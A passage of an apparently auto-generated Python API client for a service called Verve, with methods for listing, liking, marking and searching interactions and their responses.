get_responses_with_http_info(self, interaction_id, start, end, requester_id, client_token, **kwargs): """ Get list of responses by interactionId Returns the list of responses by interactionId This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_responses_with_http_info(interaction_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponseList If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'start', 'end', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_responses" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `get_responses`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_responses`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_responses`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_responses`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_responses`") resource_path = '/interactions/{interactionId}/responses'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponseList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_user_interactions(self, user_id, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of interactions shared by user Returns the list of interactions shared by specific user This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_user_interactions(user_id, interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int user_id: userId whose shared interactions want to get (required) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param int category_id: categoryId :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_user_interactions_with_http_info(user_id, interaction_status, start, end, requester_id, client_token, **kwargs) else: (data) = self.get_user_interactions_with_http_info(user_id, interaction_status, start, end, requester_id, client_token, **kwargs) return data def get_user_interactions_with_http_info(self, user_id, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of interactions shared by user Returns the list of interactions shared by specific user This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_user_interactions_with_http_info(user_id, interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int user_id: userId whose shared interactions want to get (required) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param int category_id: categoryId :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ all_params = ['user_id', 'interaction_status', 'start', 'end', 'requester_id', 'client_token', 'category_id', 'interaction_type', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_user_interactions" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user_id' is set if ('user_id' not in params) or (params['user_id'] is None): raise ValueError("Missing the required parameter `user_id` when calling `get_user_interactions`") # verify the required parameter 'interaction_status' is set if ('interaction_status' not in params) or (params['interaction_status'] is None): raise ValueError("Missing the required parameter `interaction_status` when calling `get_user_interactions`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_user_interactions`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_user_interactions`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_user_interactions`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_user_interactions`") resource_path = '/interactions/{userId}/shared'.replace('{format}', 'json') path_params = {} if 'user_id' in params: path_params['userId'] = params['user_id'] query_params = {} if 'interaction_status' in params: query_params['interactionStatus'] = params['interaction_status'] if 'category_id' in params: query_params['categoryId'] = params['category_id'] if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_user_subscribed_interaction_categories(self, user_id, start, end, requester_id, client_token, **kwargs): """ Get list of interaction categories subscribed by the user Returns the list of interaction categories subscribed by the user This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_user_subscribed_interaction_categories(user_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int user_id: User Id whose subcripbed category want to get (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: interactionType :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategoryList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_user_subscribed_interaction_categories_with_http_info(user_id, start, end, requester_id, client_token, **kwargs) else: (data) = self.get_user_subscribed_interaction_categories_with_http_info(user_id, start, end, requester_id, client_token, **kwargs) return data def get_user_subscribed_interaction_categories_with_http_info(self, user_id, start, end, requester_id, client_token, **kwargs): """ Get list of interaction categories subscribed by the user Returns the list of interaction categories subscribed by the user This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_user_subscribed_interaction_categories_with_http_info(user_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int user_id: User Id whose subcripbed category want to get (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: interactionType :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategoryList If the method is called asynchronously, returns the request thread. """ all_params = ['user_id', 'start', 'end', 'requester_id', 'client_token', 'interaction_type', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_user_subscribed_interaction_categories" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user_id' is set if ('user_id' not in params) or (params['user_id'] is None): raise ValueError("Missing the required parameter `user_id` when calling `get_user_subscribed_interaction_categories`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_user_subscribed_interaction_categories`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_user_subscribed_interaction_categories`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_user_subscribed_interaction_categories`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_user_subscribed_interaction_categories`") resource_path = '/interactions/categories/{userId}/subscribe'.replace('{format}', 'json') path_params = {} if 'user_id' in params: path_params['userId'] = params['user_id'] query_params = {} if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionCategoryList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def get_user_subscribed_interactions(self, user_id, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of interactions subscribed by user Returns the list of interactions subscribed by specific user This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_user_subscribed_interactions(user_id, interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int user_id: User Id whose subcribed interactions wants to get (required) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param int category_id: categoryId :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_user_subscribed_interactions_with_http_info(user_id, interaction_status, start, end, requester_id, client_token, **kwargs) else: (data) = self.get_user_subscribed_interactions_with_http_info(user_id, interaction_status, start, end, requester_id, client_token, **kwargs) return data def get_user_subscribed_interactions_with_http_info(self, user_id, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of interactions subscribed by user Returns the list of interactions subscribed by specific user This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_user_subscribed_interactions_with_http_info(user_id, interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int user_id: User Id whose subcribed interactions wants to get (required) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param int category_id: categoryId :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ all_params = ['user_id', 'interaction_status', 'start', 'end', 'requester_id', 'client_token', 'category_id', 'interaction_type', 'association', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_user_subscribed_interactions" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user_id' is set if ('user_id' not in params) or (params['user_id'] is None): raise ValueError("Missing the required parameter `user_id` when calling `get_user_subscribed_interactions`") # verify the required parameter 'interaction_status' is set if ('interaction_status' not in params) or (params['interaction_status'] is None): raise ValueError("Missing the required parameter `interaction_status` when calling `get_user_subscribed_interactions`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_user_subscribed_interactions`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_user_subscribed_interactions`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_user_subscribed_interactions`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_user_subscribed_interactions`") resource_path = '/interactions/{userId}/subscribe'.replace('{format}', 'json') path_params = {} if 'user_id' in params: path_params['userId'] = params['user_id'] query_params = {} if 'interaction_status' in params: query_params['interactionStatus'] = params['interaction_status'] if 'category_id' in params: query_params['categoryId'] = params['category_id'] if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def like_response(self, interaction_id, response_id, requester_id, client_token, **kwargs): """ Like response Allows the user to like the response. This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.like_response(interaction_id, response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.like_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs) else: (data) = self.like_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs) return data def like_response_with_http_info(self, interaction_id, response_id, requester_id, client_token, **kwargs): """ Like response Allows the user to like the response. This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.like_response_with_http_info(interaction_id, response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'response_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method like_response" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `like_response`") # verify the required parameter 'response_id' is set if ('response_id' not in params) or (params['response_id'] is None): raise ValueError("Missing the required parameter `response_id` when calling `like_response`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `like_response`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `like_response`") resource_path = '/interactions/{interactionId}/responses/{responseId}/like'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] if 'response_id' in params: path_params['responseId'] = params['response_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponse', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def mark_as_an_response(self, interaction_id, response_id, requester_id, client_token, **kwargs): """ Mark response as a response Marks the response as accepted. This means the user is satisfied with the response & then the interaction will go into closed state This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.mark_as_an_response(interaction_id, response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.mark_as_an_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs) else: (data) = self.mark_as_an_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs) return data def mark_as_an_response_with_http_info(self, interaction_id, response_id, requester_id, client_token, **kwargs): """ Mark response as a response Marks the response as accepted. This means the user is satisfied with the response & then the interaction will go into closed state This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.mark_as_an_response_with_http_info(interaction_id, response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'response_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method mark_as_an_response" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `mark_as_an_response`") # verify the required parameter 'response_id' is set if ('response_id' not in params) or (params['response_id'] is None): raise ValueError("Missing the required parameter `response_id` when calling `mark_as_an_response`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `mark_as_an_response`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `mark_as_an_response`") resource_path = '/interactions/{interactionId}/responses/{responseId}/mark'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] if 'response_id' in params: path_params['responseId'] = params['response_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponse', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def search_interactions(self, search_text, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of matching interactions Returns the list of matching interactions This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.search_interactions(search_text, interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str search_text: Search Text, keywords to search (required) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.search_interactions_with_http_info(search_text, interaction_status, start, end, requester_id, client_token, **kwargs) else: (data) = self.search_interactions_with_http_info(search_text, interaction_status, start, end, requester_id, client_token, **kwargs) return data def search_interactions_with_http_info(self, search_text, interaction_status, start, end, requester_id, client_token, **kwargs): """ Get list of matching interactions Returns the list of matching interactions This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.search_interactions_with_http_info(search_text, interaction_status, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param str search_text: Search Text, keywords to search (required) :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_type: Interaction Type :param str association: association :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionList If the method is called asynchronously, returns the request thread. """ all_params = ['search_text', 'interaction_status', 'start', 'end', 'requester_id', 'client_token', 'interaction_type', 'association', 'fields', 